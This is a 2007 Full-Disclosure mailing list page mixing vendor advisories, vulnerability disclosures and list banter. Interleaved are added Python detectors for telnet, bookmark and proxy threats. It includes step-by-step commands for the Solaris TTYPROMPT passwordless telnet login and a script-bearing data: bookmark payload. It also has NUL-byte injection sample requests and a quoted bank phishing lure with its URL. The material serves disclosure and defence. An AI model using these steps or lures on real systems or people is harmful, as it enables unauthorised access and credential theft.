2007.0/i586/kernel-enterprise-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 1e1508188ec35415a880978c3c90c7ce 2007.0/i586/kernel-legacy-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 2d0f1e67c091bd9c62cb4f63b9ef7356 2007.0/i586/kernel-source-2.6.17.11mdv-1-1mdv2007.0.i586.rpm d76607bf4889d5a6d0a3633a84475684 2007.0/i586/kernel-source-stripped-2.6.17.11mdv-1-1mdv2007.0.i586.rpm d6d3e09457c438b71cb03d3622867019 2007.0/i586/kernel-xen0-2.6.17.11mdv-1-1mdv2007.0.i586.rpm 241b7b83709ec8811fb8b2969ae5bfda 2007.0/i586/kernel-xenU-2.6.17.11mdv-1-1mdv2007.0.i586.rpm b971ee2fe8d6ddc83765cb2705671e35 2007.0/SRPMS/kernel-2.6.17.11mdv-1-1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7293720ba20f54c1522263b0d1e58577 2007.0/x86_64/kernel-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 7a32b034b1452b1d102fed6fca411aa2 2007.0/x86_64/kernel-doc-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm db02f60611db9824215440969b52d2ac 2007.0/x86_64/kernel-source-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 4751c8e5fb383bf08f29f172bc1c11f2 2007.0/x86_64/kernel-source-stripped-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm e467c45bdab2bfc663b0b0a0ab135d84 2007.0/x86_64/kernel-xen0-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm 9c00e25c5f5ea6be9d96c4a2139836a6 2007.0/x86_64/kernel-xenU-2.6.17.11mdv-1-1mdv2007.0.x86_64.rpm b971ee2fe8d6ddc83765cb2705671e35 2007.0/SRPMS/kernel-2.6.17.11mdv-1-1mdv2007.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. 
You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF3HwWmqjQ0CJFipgRAkCfAKCX0gHpVuviY1XvstagrhWoA3SO+QCfQEia bEwFnnh0MdO2y2+vSLUpPXs= =F1EK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Solaris telnet vulnerability - how many on your network?
Dear Marc,

This is hilarious; should there ever be a Top 10 of the most weird bugs, this surely is one of them. Repost for pure amusement:

Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 c's, and a literal \n. You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
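An added example, not from Thierry's message or the reposted exploit text: a Python detector that pulls NEW-ENVIRON (RFC 1572) variable definitions out of a captured telnet client stream and flags any TTYPROMPT definition, which is the wire-level footprint of the `environ define TTYPROMPT` step above. The sample stream is constructed; the post does not say whether the Solaris telnet client sends TTYPROMPT as a well-known VAR or as a USERVAR, so the parser accepts both.

```python
# Telnet and NEW-ENVIRON (RFC 1572) protocol constants
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
IS, SEND, INFO = 0, 1, 2
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def subnegotiations(stream: bytes):
    """Yield (option, payload) for every IAC SB <option> ... IAC SE block in the stream.
    A doubled IAC inside the block is collapsed to a single 0xFF data byte."""
    i, n = 0, len(stream)
    while i < n:
        start = stream.find(bytes([IAC, SB]), i)
        if start < 0 or start + 2 >= n:
            return
        option = stream[start + 2]
        payload = bytearray()
        k = start + 3
        while k < n:
            b = stream[k]
            if b == IAC:
                if k + 1 < n and stream[k + 1] == IAC:
                    payload.append(IAC)
                    k += 2
                    continue
                if k + 1 < n and stream[k + 1] == SE:
                    k += 2
                    break
                return            # stray IAC inside a subnegotiation: stop parsing
            payload.append(b)
            k += 1
        else:
            return                # block never terminated
        yield option, bytes(payload)
        i = k


def _finish(cur):
    kind = "VAR" if cur[0] == VAR else "USERVAR"
    return kind, cur[1].decode("latin-1"), cur[2].decode("latin-1")


def parse_new_environ(payload: bytes):
    """Decode an IS/INFO payload into (kind, name, value) tuples, honouring ESC."""
    if not payload or payload[0] not in (IS, INFO):
        return []
    entries, cur, target = [], None, None
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):
            if cur is not None:
                entries.append(_finish(cur))
            cur = [b, bytearray(), bytearray()]
            target = cur[1]
        elif b == VALUE and cur is not None:
            target = cur[2]
        elif b == ESC and i + 1 < len(payload):
            i += 1                # next byte is literal even if it looks like a type code
            if target is not None:
                target.append(payload[i])
        elif target is not None:
            target.append(b)
        i += 1
    if cur is not None:
        entries.append(_finish(cur))
    return entries


def find_ttyprompt(stream: bytes):
    """Return every TTYPROMPT value the client offered via NEW-ENVIRON in this stream."""
    hits = []
    for option, payload in subnegotiations(stream):
        if option != NEW_ENVIRON:
            continue
        for _, name, value in parse_new_environ(payload):
            if name.upper() == "TTYPROMPT":
                hits.append(value)
    return hits


# Constructed sample of the client side of the session above: WILL NEW-ENVIRON, an IS
# block carrying USER plus the attacker's TTYPROMPT, then the "bin c c ... c" login line.
SAMPLE_ATTACK_STREAM = bytes([
    IAC, 251, NEW_ENVIRON,                      # IAC WILL NEW-ENVIRON
    IAC, SB, NEW_ENVIRON, IS,
    VAR, *b"USER", VALUE, *b"bin",
    USERVAR, *b"TTYPROMPT", VALUE, *b"abcdef",
    IAC, SE,
]) + b"bin " + b"c " * 63 + b"c\n"

SAMPLE_NORMAL_STREAM = bytes([
    IAC, SB, NEW_ENVIRON, IS, VAR, *b"USER", VALUE, *b"alice", IAC, SE,
]) + b"alice\n"
```

On a sensor this would sit on the server-bound half of port 23; a non-empty result from find_ttyprompt on a session to a Solaris host is worth an alert regardless of what follows.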
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. (^-^) -- GUASCONI Vincent Student. http://altmylife.blogspot.com [Fr] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of America [phising email]
Dear phishers, If ever you need someone to help you with your spelling and grammar to make your phishing emails just a bit convincing, drop me a mail and I will proof-read your scam texts. I have a degree in English and I was regularly top of my class for spelling. Whilst I do not doubt your technical bot-writing capability, the standard of your text is generally poor and a dead giveaway. I will help! Ta, JR On 21/02/07, Troy Cregger [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got an email today that was crafted to look like it came from Bank of America, the message contained the following: Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on A href= http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm target=_blanksign in to Online Banking/A to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section. Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse. This may be old news though and possibly related to another story I read earlier on Zone-H here: http://www.zone-h.org/content/view/14577/31/ Troy Cregger Lead Developer, Technical Products. Kennedy Information, Inc One Phoenix Mill Ln, Fl 3 Peterborough, NH 03458 (603)924-0900 ext 662 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF3HPLnBEWLrrYRl8RAmPbAJsEhggVS+bHdwHYAi6Zrax+azPPXwCfd2T8 gKSsfPlF/9a+kPWEYacykVg= =aepj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc).

The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing.

The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible.

Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this.

Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/

This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179

/mz
http://lcamtuf.coredump.cx

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
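Added example, not part of Michal's post or the demo page: a Python check a user or admin can run over a bookmarks.html export (the Netscape bookmark-file format Firefox's export writes) to find bookmarks whose target is a data: or javascript: URL, i.e. bookmarks that carry inline content or script instead of pointing at a real location. The sample export and its data: payload are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes whose "page" is inline content or script that runs wherever the bookmark is opened.
RISKY_SCHEMES = {"data", "javascript"}


class _BookmarkParser(HTMLParser):
    """Collects (href, title) pairs from the <DT><A HREF="...">title</A> entries
    of a bookmarks.html export."""

    def __init__(self):
        super().__init__()
        self.entries = []
        self._href = None
        self._title = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":                      # HTMLParser lower-cases tag and attribute names
            self._href = dict(attrs).get("href") or ""
            self._title = []

    def handle_data(self, data):
        if self._href is not None:
            self._title.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.entries.append((self._href, "".join(self._title).strip()))
            self._href = None


def url_scheme(url: str) -> str:
    """Scheme of a bookmark URL, normalised so leading whitespace or odd casing cannot hide it."""
    return urlsplit(url.strip()).scheme.lower()


def find_script_bookmarks(bookmarks_html: str):
    """Return [(title, href)] for every bookmark whose target is a data: or javascript: URL."""
    parser = _BookmarkParser()
    parser.feed(bookmarks_html)
    parser.close()
    return [(title, href) for href, title in parser.entries
            if url_scheme(href) in RISKY_SCHEMES]


# Constructed sample export: one ordinary link, one data: page carrying script (the pattern
# the post describes, with a hypothetical payload), and one javascript: bookmarklet.
SAMPLE_BOOKMARKS = """<!DOCTYPE NETSCAPE-Bookmark-file-1>
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks</H1>
<DL><p>
    <DT><A HREF="https://www.google.com/" ADD_DATE="1172000000">Google</A>
    <DT><A HREF="data:text/html,&lt;script&gt;alert(document.cookie)&lt;/script&gt;" ADD_DATE="1172000001">Funny cat page</A>
    <DT><A HREF="  JavaScript:void(location.href='http://example.invalid/')">Bookmarklet</A>
</DL><p>
"""
```

A hit is not automatically malicious (users do keep bookmarklets on purpose), but a data: bookmark the user does not remember creating is exactly the artefact the post describes, and it should be deleted rather than opened.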
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
michal, is that a feature or a bug? maybe it is not obvious to me what you are doing, but I feel that it is almost like asking the user to bookmark a bookmarklet. of course it is a security problem if you execute an untrusted bookmarklet on a page :).

On 2/21/07, Michal Zalewski [EMAIL PROTECTED] wrote:

There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc).

The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing.

The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible.

Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this.

Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/

This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179

/mz
http://lcamtuf.coredump.cx

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On Thu, 22 Feb 2007, pdp (architect) wrote: michal, is that a feature or a bug? maybe it is not obivous to me what you are doing but it i feel that it is almost like asking the user to bookmark a bookmarklet. Bookmarklets should be bookmarkable only manually, with user knowledge and consent (that is, you need to copy-and-paste the URL, etc). This seems to be the case for javascript: URLs. Here, the situation is different: the user can, and quite likely will, unknowingly bookmark a script while attempting to bookmark a regular page via Ctrl-D + return. He doesn't expect or want this code to later run in the context of his start page or any other resource (principle of least astonishment, etc, etc). Cheers, /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox: serious cookie stealing / same-domain bypass vulnerability
There seems to be some confusion regarding the exact impact of the location.hostname vulnerability, and the ways to protect against it. I wanted to offer a quick clarification.

1) Cookie setting (session fixation) attacks can be executed universally and with no restrictions. This is demonstrated by the originally provided PoC, and is a serious security threat. A common implication of such a flaw is that the user can be forced to authenticate within attacker's session, implanted as a persistent cookie.

WARNING: The attack does not require the browser to interact with the attacked site in any way. The cookie is set somewhere else and ahead of the visit. In other words, the fact your site runs IIS does not make you any more secure. The fact your servers are behind Squid in a reverse proxy mode has no significance.

Vulnerable *clients* can be protected by a proxy that rejects requests containing a NUL character; Squid is a good example. A safer option is to implement the prefs.js workaround recommended on the test page and in Bugzilla, however... and an updated version of Firefox should be available tomorrow, anyway.

2) Frame / window manipulation and cookie stealing attacks can be executed against sites that explicitly set 'document.domain' to an arbitrary value, even if this occurs only on a single sub-page. Some high-profile sites do that, others don't. Still, the attack is very much possible; I prepared a new testcase for non-believers: http://lcamtuf.dione.cc/ffhostname_cnn.html

3) In my initial advisory, I mistakenly stated that XMLHttpRequest() can be one of attack vectors. It can't - contrary to some sources, in Firefox, this mechanism ignores document.domain altogether. You have to rely on the two methods described above - but that's quite a lot, anyway.

Cheers,
/mz

___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
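Added example, not from Michal's post and not Squid's logic: a Python sketch of the client-side proxy rule point 1 recommends, rejecting any request that carries a NUL byte. The second rule, rejecting a NUL that only appears once the request-target is percent-decoded (%00), is an assumption added here on the reasoning that the origin server would decode it; the sample requests are constructed.

```python
from urllib.parse import unquote_to_bytes


def check_request(raw: bytes):
    """Return None if the request may pass, otherwise a short reason for rejecting it."""
    # Rule 1 (the post's recommendation): any NUL byte anywhere in the request is fatal.
    if b"\x00" in raw:
        return "raw NUL byte in request"
    # Rule 2 (assumption added here): a %00 in the request-target decodes to a NUL downstream.
    head = raw.split(b"\r\n\r\n", 1)[0]
    request_line = head.split(b"\r\n")[0].split(b" ")
    if len(request_line) < 2:
        return "malformed request line"
    if b"\x00" in unquote_to_bytes(request_line[1]):
        return "percent-encoded NUL in request-target"
    return None


def filter_requests(requests):
    """Split raw requests into (accepted, rejected); rejected entries carry the reason."""
    accepted, rejected = [], []
    for raw in requests:
        reason = check_request(raw)
        if reason is None:
            accepted.append(raw)
        else:
            rejected.append((raw, reason))
    return accepted, rejected


# Constructed sample requests: a clean one, a literal NUL inside the Host header,
# and a %00 hidden in the path.
CLEAN = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
RAW_NUL = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\x00.attacker.invalid\r\n\r\n"
ENCODED_NUL = b"GET /index.html%00.attacker.invalid HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
```

This protects the browsers behind the proxy, not the site: as the post stresses, the cookie is planted before the victim ever talks to the target, so the filter must sit in front of the clients.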
[Full-disclosure] [USN-425-1] slocate vulnerability
=== Ubuntu Security Notice USN-425-1 February 22, 2007 slocate vulnerability CVE-2007-0227 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: slocate 3.0.beta.r3-1ubuntu0.1 Ubuntu 6.10: slocate 3.1-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A flaw was discovered in the permission checking code of slocate. When reporting matching files, locate would not correctly respect the parent directory's read bits. This could result in filenames being displayed when the file owner had expected them to remain hidden from other system users. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1.diff.gz Size/MD5: 8063 7eecd20fe954bbecc7024601c0ce1260 http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1.dsc Size/MD5: 684 d21f5d570fa7c79b1d335d35d7e6a5c7 http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3.orig.tar.gz Size/MD5:29590 25e8bf6732a801f0470301fa84ef959e amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_amd64.deb Size/MD5:32262 9be75b99ab8009aa9692d1b793c41f68 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_i386.deb Size/MD5:30352 75625a80073abc76faf0afa539b30c25 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_powerpc.deb Size/MD5:31614 2d176a9806e41b00430cdcad7b9c244b sparc architecture (Sun SPARC/UltraSPARC) 
http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.0.beta.r3-1ubuntu0.1_sparc.deb Size/MD5:30574 de584d717f3c389c1a5759a7f003bb3b Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1.diff.gz Size/MD5: 8201 e2cac07776d27e0917fb2aa78b8f6d3f http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1.dsc Size/MD5: 660 8b06c09cc529037c75aff55035e8a90c http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1.orig.tar.gz Size/MD5:30051 69b45865ebce0cbfeb430381f0eb8b51 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_amd64.deb Size/MD5:32384 d3ea172c7266defbebcdfb59d514b1de i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_i386.deb Size/MD5:31136 d1dde1cef1183781bda25b962ab466ec powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_powerpc.deb Size/MD5:31922 12a84a8029dbeb33bb65ff1a71785767 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/s/slocate/slocate_3.1-1ubuntu0.1_sparc.deb Size/MD5:31062 827164a9dee3431fe353bb04c061de97 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
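Added example, not Ubuntu's or slocate's own code: a Python model of the permission check a locate-style tool has to make before it prints a filename. The in-memory filesystem, uids and modes are constructed. The "buggy" variant models the class of mistake the notice describes (a check that does not respect the parent directory's read bits); it is not a reconstruction of slocate's actual code.

```python
# Constructed in-memory filesystem: path -> (mode, owner uid, owner gid).
SAMPLE_FS = {
    "/":                     (0o755, 0, 0),
    "/home":                 (0o755, 0, 0),
    "/home/alice":           (0o700, 1000, 1000),
    "/home/alice/diary.txt": (0o644, 1000, 1000),
    "/srv":                  (0o755, 0, 0),
    "/srv/drop":             (0o711, 1000, 1000),   # others may traverse it, but not list it
    "/srv/drop/report.txt":  (0o644, 1000, 1000),
    "/tmp":                  (0o1777, 0, 0),
    "/tmp/notes.txt":        (0o644, 1000, 1000),
}

ALICE, BOB = 1000, 1001


def effective_bits(entry, uid, gids):
    """The rwx triplet that applies to this caller: owner, group or other class."""
    mode, owner, group = entry
    if uid == owner:
        return (mode >> 6) & 7
    if group in gids:
        return (mode >> 3) & 7
    return mode & 7


def ancestors(path):
    """Directories leading to path, root first: '/a/b/c' -> ['/', '/a', '/a/b']."""
    parts = path.strip("/").split("/")
    return ["/"] + ["/" + "/".join(parts[:i]) for i in range(1, len(parts))]


def may_list_correct(fs, path, uid, gids):
    """A name is visible only if every ancestor is searchable (x) by the caller
    and the immediate parent is readable (r), which is what ls would require."""
    if uid == 0:
        return True
    dirs = ancestors(path)
    if not all(effective_bits(fs[d], uid, gids) & 1 for d in dirs):
        return False
    return bool(effective_bits(fs[dirs[-1]], uid, gids) & 4)


def may_list_buggy(fs, path, uid, gids):
    """Models the flawed check: traversal (x) is enforced, the parent's read bit is ignored,
    so names inside a 0711 directory leak to users who could not ls it."""
    if uid == 0:
        return True
    return all(effective_bits(fs[d], uid, gids) & 1 for d in ancestors(path))


def locate(fs, needle, uid, gids, check=may_list_correct):
    """Substring search over the index, filtered by the chosen permission check."""
    return sorted(p for p in fs if needle in p and check(fs, p, uid, gids))
```

The interesting case is /srv/drop: bob can pass through it (x) but cannot read it, so `ls /srv/drop` fails for him, and a correct locate must hide report.txt even though the file itself is world-readable.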
Re: [Full-disclosure] Bank of America [phising email]
Yes yes! They will make sure of course however the dumb person that falls for it thinks hey look Bank Of America can't spell heheheh On 2/21/07, James Rankin [EMAIL PROTECTED] wrote: Dear phishers, If ever you need someone to help you with your spelling and grammar to make your phishing emails just a bit convincing, drop me a mail and I will proof-read your scam texts. I have a degree in English and I was regularly top of my class for spelling. Whilst I do not doubt your technical bot-writing capability, the standard of your text is generally poor and a dead giveaway. I will help! Ta, JR On 21/02/07, Troy Cregger [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Got an email today that was crafted to look like it came from Bank of America, the message contained the following: Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account. So we have decided to put an extra verification process to ensure your identity and your account security. Please click on A href= http://www.candy-pop.com/www.bankofamerica.com/BOA/sslencrypt218bit/online_banking/index.htm target=_blanksign in to Online Banking/A to continue to the verification process and ensure your account security. It is all about your security. Thank you, and visit the customer service section. Which of course loads a phishing page that would capture login credentials should anyone fall for the ruse. This may be old news though and possibly related to another story I read earlier on Zone-H here: http://www.zone-h.org/content/view/14577/31/ Troy Cregger Lead Developer, Technical Products. 
Kennedy Information, Inc One Phoenix Mill Ln, Fl 3 Peterborough, NH 03458 (603)924-0900 ext 662 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF3HPLnBEWLrrYRl8RAmPbAJsEhggVS+bHdwHYAi6Zrax+azPPXwCfd2T8 gKSsfPlF/9a+kPWEYacykVg= =aepj -END PGP SIGNATURE- -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Disclosure Advisory on Full-Disclosure hax0r3rz
to forgive me but if you will be going to call peoples in the list morons because they affix the posts constantly to feed egos can you at least mentioning gadi enron and valdis kletnieks for the names ? perhaps perhaps also you do not realize that this list does not have nothing absolutely to do with security of the computer. you are perhaps wearing a jacket sports? please make the verification and if so removes it ! On 2/21/07, Mofo Haxsor [EMAIL PROTECTED] wrote: Weakness in Full Disclosure mailing list allows morons to flourish Vulnerable: The entire mailing list Severity: Critic-Ill Classification: Loser Validation BugTraq-ID: TBA CVE-Number: TBA Remote Exploit: YUP Local Exploit: YUP Vendor URL: http://lists.grok.org.uk Author: Mai Long Wang Scheduled Release date: Feb 21st, 2007 Notifications: Right now retard Problem: By keeping an unmoderated mailing list, Full Disclosure has introduced the security community to insane amount of idiots who think that downloading any and all PHP based software then running: for i in `find . -name *.php` do grep phpinfo $i echo eye can hax0r1ze y0ur bl0g done This issue has become increasingly disturbing as idiots from all over the world have not been able to differentiate themselves between mules (aka asses) from real hackers. Full disclosure has also introduced other types of clowns who spam up legitimate users' email boxes with moronic responses fired off in desperation in attempts to boost the clown's ego. Vendor Response: None. Vendor is also clueless Solution: Introduce a security mailing list for professionals that is moderated, its users have been validated, and the typical response will not be: Sh4r j00 fackinG luzer. I pwned your php webserver with my lam3 ass 0day Did j0o s33 how I hax0rfied their server Mustafa! Praises be due to allah! Joo facking Jews. I said so therefore it is! mYe SiGnAtUrE iS r33t wAiT tILL eYe sh0w mYe Netzero and AOL gaytarded buddies I can hax0r! 
Workaround: Filter luzers' email addresses Credit: Old schoolers who know damn well where this advisory is coming from. Greets: Greets go out to the dinosaurs no longer on the scene. Those on the scene... You know where to find me. Copyright: Copytheft (c) 2007 x to the p zero This report should be copied and redistributed to the idiots on this list whenever possible in attempts to get them to finally shut their damn mouths in efforts to minimize the nonsense filling my email ebox. Additional thoughts on minimizing the amount of idiocy would be taking a stick and using some of these idiots as a party Pinata. This report is intended to make users think before they shoot off dumb ass messages no one gives a flying fuck about. Moderators are asked to do something productive which is called moderate. Idiots are also asked to be productive and swallow a gallon of Liquid Drano before bedtime. Parents are also asked to monitor their little rejects and give the some attention so they can stop playing hax0rs and giving security professionals a bad rap when the word hacker comes into a business conversation. It's been too long that the mention of the word hacker sets of unwarranted paranoia. -- http://a8-asy.a8ww.net/a8-ads/adftrclick?redirectid=en-mail_a_01 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability
On 2/22/07, Michal Zalewski [EMAIL PROTECTED] wrote: There is an interesting vulnerability in how Firefox handles bookmarks. The flaw allows the attacker to steal credentials from commonly used browser start sites (for Firefox, Google is the seldom changed default; that means exposure of GMail authentication cookies, etc). The problem: it is relatively easy to trick a casual user into bookmarking a window that does not point to any physical location, but rather, is an inline data: URL scheme. When such a link is later retrieved, Javascript code placed therein will execute in the context of a currently visited webpage. The destination page can then continue to load without the user noticing. The impact of such a vulnerability isn't devastating, but as mentioned earlier, any attention-grabbing webpage can exploit this to silently launch attacks against Google, MSN, AOL credentials, etc. In an unlikely case the victim is browsing local files or special URLs before following a poisoned bookmark, system compromise is possible. Thanks to Piotr Szeptynski for bringing up the subject of bookmarks and inspiring me to dig into this. Self-explanatory demo page: http://lcamtuf.coredump.cx/ffbook/ This is being tracked as: https://bugzilla.mozilla.org/show_bug.cgi?id=371179 In April, just after MoPHPB, Michal Zalewski is going to plan a Month of Firefox Bugs. Oh no!! n3tty does not like that!! :( ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
